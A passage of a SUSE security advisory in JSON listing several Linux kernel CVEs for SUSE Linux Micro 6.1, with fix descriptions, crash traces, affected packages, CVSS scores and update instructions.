[btrfs]\n [337571.285864] ? __kmem_cache_alloc_node+0x14a/0x410\n [337571.286086] btrfs_ioctl+0x249a/0x3320 [btrfs]\n [337571.286358] ? mod_objcg_state+0xd2/0x360\n [337571.286577] ? refill_obj_stock+0xb0/0x160\n [337571.286798] ? seq_release+0x25/0x30\n [337571.287016] ? __rseq_handle_notify_resume+0x3ba/0x4b0\n [337571.287235] ? percpu_counter_add_batch+0x2e/0xa0\n [337571.287455] ? __x64_sys_ioctl+0x88/0xc0\n [337571.287675] __x64_sys_ioctl+0x88/0xc0\n [337571.287901] do_syscall_64+0x38/0x90\n [337571.288126] entry_SYSCALL_64_after_hwframe+0x72/0xdc\n [337571.288352] RIP: 0033:0x7f478aaffe9b\n\nSo fix this by locking struct btrfs_fs_info::trans_lock before deleting\nthe quota root from that list.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54032",
"url": "https://www.suse.com/security/cve/CVE-2023-54032"
},
{
"category": "external",
"summary": "SUSE Bug 1255617 for CVE-2023-54032",
"url": "https://bugzilla.suse.com/1255617"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54032"
},
{
"cve": "CVE-2023-54035",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54035"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnetfilter: nf_tables: fix underflow in chain reference counter\n\nSet element addition error path decrements reference counter on chains\ntwice: once on element release and again via nft_data_release().\n\nThen, d6b478666ffa (\"netfilter: nf_tables: fix underflow in object\nreference counter\") incorrectly fixed this by removing the stateful\nobject reference count decrement.\n\nRestore the stateful object decrement as in b91d90368837 (\"netfilter:\nnf_tables: fix leaking object reference count\") and let\nnft_data_release() decrement the chain reference counter, so this is\ndone only once.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54035",
"url": "https://www.suse.com/security/cve/CVE-2023-54035"
},
{
"category": "external",
"summary": "SUSE Bug 1255563 for CVE-2023-54035",
"url": "https://bugzilla.suse.com/1255563"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54035"
},
{
"cve": "CVE-2023-54037",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54037"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nice: prevent NULL pointer deref during reload\n\nCalling ethtool during reload can lead to call trace, because VSI isn\u0027t\nconfigured for some time, but netdev is alive.\n\nTo fix it add rtnl lock for VSI deconfig and config. Set ::num_q_vectors\nto 0 after freeing and add a check for ::tx/rx_rings in ring related\nethtool ops.\n\nAdd proper unroll of filters in ice_start_eth().\n\nReproduction:\n$watch -n 0.1 -d \u0027ethtool -g enp24s0f0np0\u0027\n$devlink dev reload pci/0000:18:00.0 action driver_reinit\n\nCall trace before fix:\n[66303.926205] BUG: kernel NULL pointer dereference, address: 0000000000000000\n[66303.926259] #PF: supervisor read access in kernel mode\n[66303.926286] #PF: error_code(0x0000) - not-present page\n[66303.926311] PGD 0 P4D 0\n[66303.926332] Oops: 0000 [#1] PREEMPT SMP PTI\n[66303.926358] CPU: 4 PID: 933821 Comm: ethtool Kdump: loaded Tainted: G OE 6.4.0-rc5+ #1\n[66303.926400] Hardware name: Intel Corporation S2600WFT/S2600WFT, BIOS SE5C620.86B.00.01.0014.070920180847 07/09/2018\n[66303.926446] RIP: 0010:ice_get_ringparam+0x22/0x50 [ice]\n[66303.926649] Code: 90 90 90 90 90 90 90 90 f3 0f 1e fa 0f 1f 44 00 00 48 8b 87 c0 09 00 00 c7 46 04 e0 1f 00 00 c7 46 10 e0 1f 00 00 48 8b 50 20 \u003c48\u003e 8b 12 0f b7 52 3a 89 56 14 48 8b 40 28 48 8b 00 0f b7 40 58 48\n[66303.926722] RSP: 0018:ffffad40472f39c8 EFLAGS: 00010246\n[66303.926749] RAX: ffff98a8ada05828 RBX: ffff98a8c46dd060 RCX: ffffad40472f3b48\n[66303.926781] RDX: 0000000000000000 RSI: ffff98a8c46dd068 RDI: ffff98a8b23c4000\n[66303.926811] RBP: ffffad40472f3b48 R08: 00000000000337b0 R09: 0000000000000000\n[66303.926843] R10: 0000000000000001 R11: 0000000000000100 R12: ffff98a8b23c4000\n[66303.926874] R13: ffff98a8c46dd060 R14: 000000000000000f R15: ffffad40472f3a50\n[66303.926906] FS: 00007f6397966740(0000) GS:ffff98b390900000(0000) knlGS:0000000000000000\n[66303.926941] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[66303.926967] CR2: 0000000000000000 CR3: 000000011ac20002 CR4: 00000000007706e0\n[66303.926999] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\n[66303.927029] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400\n[66303.927060] PKRU: 55555554\n[66303.927075] Call Trace:\n[66303.927094] \u003cTASK\u003e\n[66303.927111] ? __die+0x23/0x70\n[66303.927140] ? page_fault_oops+0x171/0x4e0\n[66303.927176] ? exc_page_fault+0x7f/0x180\n[66303.927209] ? asm_exc_page_fault+0x26/0x30\n[66303.927244] ? ice_get_ringparam+0x22/0x50 [ice]\n[66303.927433] rings_prepare_data+0x62/0x80\n[66303.927469] ethnl_default_doit+0xe2/0x350\n[66303.927501] genl_family_rcv_msg_doit.isra.0+0xe3/0x140\n[66303.927538] genl_rcv_msg+0x1b1/0x2c0\n[66303.927561] ? __pfx_ethnl_default_doit+0x10/0x10\n[66303.927590] ? __pfx_genl_rcv_msg+0x10/0x10\n[66303.927615] netlink_rcv_skb+0x58/0x110\n[66303.927644] genl_rcv+0x28/0x40\n[66303.927665] netlink_unicast+0x19e/0x290\n[66303.927691] netlink_sendmsg+0x254/0x4d0\n[66303.927717] sock_sendmsg+0x93/0xa0\n[66303.927743] __sys_sendto+0x126/0x170\n[66303.927780] __x64_sys_sendto+0x24/0x30\n[66303.928593] do_syscall_64+0x5d/0x90\n[66303.929370] ? __count_memcg_events+0x60/0xa0\n[66303.930146] ? count_memcg_events.constprop.0+0x1a/0x30\n[66303.930920] ? handle_mm_fault+0x9e/0x350\n[66303.931688] ? do_user_addr_fault+0x258/0x740\n[66303.932452] ? exc_page_fault+0x7f/0x180\n[66303.933193] entry_SYSCALL_64_after_hwframe+0x72/0xdc",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54037",
"url": "https://www.suse.com/security/cve/CVE-2023-54037"
},
{
"category": "external",
"summary": "SUSE Bug 1255557 for CVE-2023-54037",
"url": "https://bugzilla.suse.com/1255557"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54037"
},
{
"cve": "CVE-2023-54038",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54038"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nBluetooth: hci_conn: return ERR_PTR instead of NULL when there is no link\n\nhci_connect_sco currently returns NULL when there is no link (i.e. when\nhci_conn_link() returns NULL).\n\nsco_connect() expects an ERR_PTR in case of any error (see line 266 in\nsco.c). Thus, hcon set as NULL passes through to sco_conn_add(), which\ntries to get hcon-\u003ehdev, resulting in dereferencing a NULL pointer as\nreported by syzkaller.\n\nThe same issue exists for iso_connect_cis() calling hci_connect_cis().\n\nThus, make hci_connect_sco() and hci_connect_cis() return ERR_PTR\ninstead of NULL.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54038",
"url": "https://www.suse.com/security/cve/CVE-2023-54038"
},
{
"category": "external",
"summary": "SUSE Bug 1255540 for CVE-2023-54038",
"url": "https://bugzilla.suse.com/1255540"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54038"
},
{
"cve": "CVE-2023-54042",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54042"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\npowerpc/64s: Fix VAS mm use after free\n\nThe refcount on mm is dropped before the coprocessor is detached.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54042",
"url": "https://www.suse.com/security/cve/CVE-2023-54042"
},
{
"category": "external",
"summary": "SUSE Bug 1255702 for CVE-2023-54042",
"url": "https://bugzilla.suse.com/1255702"
},
{
"category": "external",
"summary": "SUSE Bug 1257670 for CVE-2023-54042",
"url": "https://bugzilla.suse.com/1257670"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
